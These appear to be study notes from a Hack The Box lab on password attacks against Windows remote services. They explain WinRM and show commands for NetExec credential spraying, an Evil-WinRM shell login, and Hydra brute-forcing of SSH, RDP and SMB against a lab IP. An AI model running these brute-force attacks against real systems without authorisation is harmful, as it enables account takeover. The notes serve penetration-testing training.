<aside> <img src="/icons/error_yellow.svg" alt="/icons/error_yellow.svg" width="40px" />

Network Services

</aside>

Let us imagine that we want to manage a Windows server over the network. Accordingly, we need a service that allows us to access the system, execute commands on it, or access its contents via a GUI or the terminal. In this case, the most common services suitable for this are RDP, WinRM, and SSH. SSH is not as common on Windows, but it is the leading service for Linux-based systems.

WinRM

Windows Remote Management (WinRM) is the Microsoft implementation of the Web Services Management Protocol (WS-Management). It is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP) used for remote management of Windows systems. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).

By default, WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS). A handy tool that we can use for our password attacks is NetExec, which can also be used for other protocols such as SMB, LDAP, MSSQL, and others.

NetExec Protocol-Specific Help

usage: netexec smb [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
                   [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
                   [--dns-server DNS_SERVER] [--dns-tcp]
                   [--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]]
                   [-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]]
                   [--ignore-pw-decoding] [--no-bruteforce]
                   [--continue-on-success] [--gfail-limit LIMIT]
                   [--ufail-limit LIMIT] [--fail-limit LIMIT] [-k]
                   [--use-kcache] [--aesKey AESKEY [AESKEY ...]]
                   [--kdcHost KDCHOST] [--server {https,http}]
                   [--server-host HOST] [--server-port PORT]

NetExec Usage ⚒️

0xWALY@htb[/htb]$ netexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

As an example, this is what attacking a WinRM endpoint might look like:

0xWALY@htb[/htb]$ netexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] <http://10.129.42.197:5985/wsman>
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Evil-WinRM, which allows us to communicate with the WinRM service efficiently

evil-winrm -i 10.129.42.197 -u user -p password

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\user\Documents>

Hydra - SSH

hydra -L user.list -P password.list ssh://10.129.42.197
#then
ssh [email protected]

Remote Desktop Protocol (RDP)

hydra -L user.list -P password.list rdp://10.129.42.197
#then 
xfreerdp /v:10.129.42.197 /u:user /p:password

Hydra - SMB

hydra -L user.list -P password.list smb://10.129.42.197